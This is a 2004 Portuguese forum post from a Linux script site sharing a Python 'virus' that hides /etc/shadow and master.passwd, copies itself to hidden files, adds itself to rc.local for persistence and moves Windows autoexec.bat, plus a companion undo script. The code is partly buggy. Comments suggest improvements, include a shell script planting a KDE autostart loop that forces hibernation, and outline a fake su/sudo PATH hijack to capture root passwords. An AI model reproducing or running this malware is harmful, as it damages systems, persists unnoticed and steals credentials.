Virus, trojan, sei la o que é isso

Publicado por Ricardo Henrique 22/08/2004

[ Hits: 26.571 ]

Download home.zip




Estava fazendo um projeto de um semi-virus ou seria um trojan..., sei lá o q é isso, mas faz um estrago. LEIA O CODIGO FONTE ANTES DE EXECUTAR...... RESPONSABILIDADE É SUA

ACEITO AJUDAS..............
Se voce executou o virus use o anti-virus para tentar recuperar as coisas
REPETINDO...
LEIA O CODIGO FONTE ANTES DE EXECUTAR...... RESPONSABILIDADE É SUA

  



Esconder código-fonte

#ESSE É O CODIGO DO VIRUS
#------------------------------------
#!/usr/bin/env python
import os 
#####################################
#Virus and python                   #
#version 0.5                        #
#                                   #
#Colaborações sao bem vindas        #
#                     #
#DICA: Antes de executar o programa #
#copie os arquivos /etc/shadow e o  #
#arquivo do windows autoexec.bat    #
#                     #
#NAO ME RESPONSABILIZO PELOS        #
#DANOS CAUSADOS, ISSO É PROBLEMA SEU#
#                #
#REGISTRADO PELA A LICENCA GPL      #
#####################################
def linux():
   try:
    os.system('mv /etc/shadow /etc/.shadow') # Copia o arquivo caso vc execute o virus
    list()   # Vai para a funcao list()
   except:
    bsd()   

def bsd():
   try:
    os.system('mv /etc/master.passwd /etc/.master.passwd') # Copia o arquivo caso vc execute o virus
    list() # Vai para a funcao list()
   except:
    list()

def list(): # Funcao lista
   arq = open(".list.txt", 'a') # Cria ou abre o arquivo oculto .list.txt
   lis = os.listdir('/etc/') #Lista o que tem no /etc/
   aa = "%s" %(lis)
   arq.write(aa) # Grava no arquivo
   arq.close()
   os.system('cp virus.py .arq.py') # Copia o virus
   os.system('cp .arq.py ../.conf.py'); # PODE ME SER UTIL ALGUN DIA ... COPIA PARA OUTROS DIRETORIOS, O DE BAIXO TAMBEM
   os.system('cp .arq.py /etc/rc.d/.conf.py')
   
   os.system('cp /etc/rc.d/rc.local /etc/rc.d/.rc.local')
   rc = open("/etc/rc.d/rc.local",'a') # Abre o arquivo de inicializacao
   rc1 = "python /etc/rc.d/.conf.py\n"
   aaa = "%s" %(rc1)
   rc.write(aaa)
   rc.close()
   
   os.system('chmod -x .arq.py') # muda as permisoes
   os.system('chown root.root .arq.py') # muda o usuario
   procura()

def win_c():
   try:
    os.system('mv /mnt/win_c/autoexec.bat .autoexec.bat') # Num preciso nem falar
    #os.remove('/mnt/win_c/autoexec.bat') # se vc tem windows no /mnt/win_c ele exclui o autoexec.bat
   except:
    exit # se nao tiver windows ou ele nao está em nenhuma destas pastas ele sai do prog

def c():
   try:
    os.sytem('mv /mnt/c/autoexec.bat .autoexec.bat') # num vo fala nada ^^^
    #os.remove('/mnt/c/autoexec.bat') # se vc tem windows no /mnt/c ele exclui o autoexec.bat
   except:
    win_c() # caso nao tenha ele vai para a funcao win_c()

def procura():
   try:
    os.remove('mv /mnt/windows/autoexec.bat ./.autoexec.bat')# o q será isso?????^^^^?????
    #os.remove('/mnt/windows/autoexec.bat') # caso vc tenha windows no /mnt/windows ele exclui o autoexec.bat
   except:
    c() # se nao tiver ele passa para a funcao c()

def dig():
   linux() # Colocar alguma coisa

dig()
#----------------------------------------------
# AGORA o DO ANTI-VIRUS
#---------------------------------------------
#!/usr/bin/python

################################
#Quem Cria também distroi      #
#Anti-virus para a merda que eu#
#fiz....infeslimente..o feitiço#
#virou contra o feiticeiro.....#
#tomara que funcione          #
###############################
import os

def linux():
        try:
         os.system('cp /etc/.shadow /etc/shadow') # Copia o arquivo caso vc execute o virus
         #os.remove('/etc/shadow') # Remove o arquivo etc shadow
         list() # Vai para a funcao list()
        except:
         bsd()

def bsd():
        try:
         os.system('cp /etc/.master.passwd /etc/master.passwd') # Copia o arquivo caso vc execute o virus
         #os.remove('/etc/master.passwd') # Remove o arquivo /etc/master.passwd
         list() # Vai para a funcao list()
        except:
         list()

def list(): # Funcao lista
        os.system('rm -rf .list.txt') # Deleta o arquivo oculto .list.txt
        
   os.system('rm -rf .arq.py') # Remove o virus
        os.system('rm -rf ../.conf.py'); # remove o virus
        os.system('rm -rf /etc/rc.d/.conf.py')

        os.system('cp /etc/rc.d/.rc.local /etc/rc.d/rc.local')
        procura()

def win_c():
        try:
         os.system('cp .autoexec.bat /mnt/win_c/autoexec.bat') # Num preciso nem falar
         #os.remove('/mnt/win_c/autoexec.bat') # se vc tem windows no /mnt/win_c ele exclui o autoexec.bat
        except:
         exit # se nao tiver windows ou ele nao está em nenhuma destas pastas ele sai do prog

def c():
        try:
         os.sytem('cp .autoexec.bat /mnt/c/autoexec.bat') # num vo fala nada ^^^
         #os.remove('/mnt/c/autoexec.bat') # se vc tem windows no /mnt/c ele exclui o autoexec.bat
        except:
         win_c() # caso nao tenha ele vai para a funcao win_c()

def procura():
        try:
         os.remove('cp .autoexec.bat /mnt/windows/autoexec.bat')# o q será isso?????^^^^?????
         #os.remove('/mnt/windows/autoexec.bat') # caso vc tenha windows no /mnt/windows ele exclui o autoexec.bat
        except:
         c() # se nao tiver ele passa para a funcao c()

def dig():
        linux() # Colocar alguma coisa

dig()

Scripts recomendados

Leitura de todos os valores de qualquer xml

Um Script basico que tenho

Algoritmo de escala de cinza

multimídia tools 0.1 BETA

Consumo de memória por processo


  

Comentários
[1] Comentário enviado por karlphillip em 22/08/2004 - 15:14h

Olá Ricardo, tenho uma outra consideração a fazer para a melhoria do programa.
Para ele funcionar corretamente, temos que REZAR para que o usuário o execute como ROOT. Supondo que ele faça isso, o programa tenta excluir o AUTOEXEC.BAT em /mnt/windows, /mnt/win_c, /mnt/c.

Veja.. mais uma rezinha qui. O usuário além de ser ROOT, já tem que estar com a partição rWindows montada em um desses 3 lugares que você especificou. Por exemplo, eu monto meu rWindows em: /mnt/win (simples, não é?!). Não deixo ele no FSTAB não. Qdo preciso do rWindows eu monto.

Então que tal o seu programa montar a partição /dev/hda1 em /mnt/PASTA_CRIADA_POR_VC ???

10% dos usuários de Linux que têm rWindows nas suas máquinas estão com o rWindows aí no HDA1, melhor do que ficar chutando. Já que você supõe que o usuário vai ser ROOT, então monte você a partição do cara. Que você acha?

Boa sorte,

[2] Comentário enviado por hugh em 23/08/2004 - 15:14h

Acho que você teria menos trabalho fazendo vírus para usuários do janelas, que o usuario não precise ser administrador do sistema para executar e não para usuários do linux no intuito de fuder com o janelas, aliás, quem usa linux ja ta se fodendo pra ele!

[3] Comentário enviado por lowpis em 23/08/2004 - 16:54h

com todo respeito, isso aí nao tem nada a ver. nao sei qual é a definicao formal de virus, mas pra mim isso aí nao eh virus nenhum... as chances de eu digitar "rm /" como root sao maiores q isso aí ser executado como virus por alguem...

[4] Comentário enviado por Ale_ em 23/08/2004 - 17:32h

realmente nao é um virus, mas um script em python com o intuito de fud** com o win ... da pra ser bem melhorado =P
se bem que um viruz ou algo do tipo teria de ser feito ou em c, c++, asm... por ae...
qlqr coisa entre em contato...
psy.box@phreaker.net

[5] Comentário enviado por nexushu em 30/11/2005 - 11:08h

Bom cara trojans são virus que abrem portas para saber as que estão vuneraveis o virus e pode ser feito em c++ talves ate em JADE sei la eu tenho um CD lotado disso

[6] Comentário enviado por Miojo em 12/03/2010 - 19:32h

#!/bin/sh
# Criado por Artur Gaspar
# Um simples script de vírus para Linux. Não sei nem se funciona :D.
# O `echo ' '' '' '' ''powerdevil.Hibernate()'` é para ele funcionar quando copiado do Viva o Linux (http://www.vivaolinux.com.br/), que remove os espaços.
cat <<EOF > $HOME/.kde4/Autostart/virus.py
#!/usr/bin/python
sessionBus = dbus.SessionBus()
powerdevil = sessionBus.get_object('org.kde.powerdevil', '/org/freedesktop/PowerManagement')
while True:
`echo ' '' '' '' ''powerdevil.Hibernate()'`
EOF

chmod +x $HOME/.kde4/Autostart/virus.py

[7] Comentário enviado por Miojo em 11/04/2010 - 10:44h

uma ideia.
ele edita o ~/.bashrc e adiciona ele mesmo para ser iniciado e ~/.virus em primeiro lugar no $PATH. neste ~/.virus, ele cria falsos su, sudo, kdesu, kdesudo, gksu etc. Como o ~/.virus esta em 1º no $PATH, esses programas falsos vão ser executados quando o usuário precisar de fazer algo como root. uma vez com a senha de root e sendo auto-iniciado, ele se coloca na inicialização do sistema e pode fazer o que quiser.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts